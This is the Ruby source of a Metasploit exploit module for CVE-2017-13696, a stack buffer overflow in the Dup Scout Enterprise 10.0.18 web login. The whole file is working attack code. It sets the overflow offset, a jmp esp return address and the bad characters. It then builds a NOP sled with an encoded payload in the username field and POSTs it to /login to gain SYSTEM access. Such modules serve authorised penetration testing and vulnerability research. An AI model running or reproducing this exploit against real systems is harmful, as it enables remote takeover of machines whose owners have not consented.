##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
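class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Total length of the `username` field sent to the server. Everything after
  # the payload is NOP-padded up to this size (see #exploit).
  BUFFER_SIZE = 10000

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dup Scout Enterprise Login Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Dup Scout Enterprise
        10.0.18. The buffer overflow exists via the web interface during
        login. This gives NT AUTHORITY\SYSTEM access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Chris Higgins', # msf Module -- @ch1gg1ns
          'sickness'       # Original discovery
        ],
      'References'     =>
        [
          [ 'CVE', '2017-13696' ],
          [ 'EDB', '43145' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # NUL/CR/LF and the URL-form delimiters (% & + =) would terminate or
          # alter the POST body before it reaches the vulnerable copy.
          'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d",
          # BUFFER_SIZE minus offset (780), return address (4) and NOP sled (12).
          # Lets the framework pick/encode a payload that fits the buffer layout
          # built in #exploit instead of overflowing it silently.
          'Space'    => 9204
        },
      'Targets'        =>
        [
          [ 'Dup Scout Enterprise 10.0.18',
            {
              'Ret'    => 0x10090c83, # jmp esp - libspp.dll
              'Offset' => 780         # bytes of filler before EIP is overwritten
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2017-11-14',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(80)])
  end

  # Fingerprint the target by requesting the web UI root.
  #
  # @return [Exploit::CheckCode] Appears when the index page advertises the
  #   exact vulnerable build, Unknown when no HTTP response was received at
  #   all (host down / not HTTP), Safe for any other response.
  def check
    res = send_request_cgi(
      'uri'    => '/',
      'method' => 'GET'
    )

    # No response is not evidence of safety; report Unknown rather than Safe
    # so scans do not mark unreachable hosts as patched.
    return Exploit::CheckCode::Unknown unless res

    if res.code == 200 && res.body =~ /Dup Scout Enterprise v10\.0\.18/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  # Build the oversized `username` value and POST it to /login.
  #
  # Layout: [Offset bytes of filler][Ret][12 NOPs][payload][NOP pad to BUFFER_SIZE].
  # Raises Failure::BadConfig (via fail_with) if the encoded payload does not
  # fit, instead of passing a negative length to make_nops.
  def exploit
    connect

    print_status('Generating exploit...')
    evil = rand_text(target['Offset'])
    evil << [target.ret].pack('V')
    evil << make_nops(12)
    evil << payload.encoded

    if evil.length > BUFFER_SIZE
      fail_with(Failure::BadConfig,
                "Encoded payload too large: buffer is #{evil.length} bytes, limit is #{BUFFER_SIZE}")
    end
    evil << make_nops(BUFFER_SIZE - evil.length)
    vprint_status("Evil length: #{evil.length}")

    sploit = 'username='
    sploit << evil
    sploit << '&password='
    sploit << rand_text(evil.length)
    sploit << "\r\n"

    print_status('Triggering the exploit now...')
    send_request_cgi(
      'uri'            => '/login',
      'method'         => 'POST',
      'content-type'   => 'application/x-www-form-urlencoded',
      # NOTE(review): 'content-length' is not a documented request option; the
      # HTTP client derives Content-Length from 'data'. Carried over from the
      # original PoC (EDB 43145) — confirm it is ignored, then drop it, since
      # the real body is ~20000 bytes, not 17000.
      'content-length' => '17000',
      'data'           => sploit
    )

    handler
    disconnect
  end
end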